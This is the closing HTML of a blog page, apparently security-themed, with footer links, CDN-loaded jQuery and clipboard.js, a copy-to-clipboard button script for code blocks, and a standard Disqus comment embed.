       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/takuyasec/">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.bootcdn.net/ajax/libs/lxgw-wenkai-screen-webfont/1.6.0/style.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'p0w1rSh4ll';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
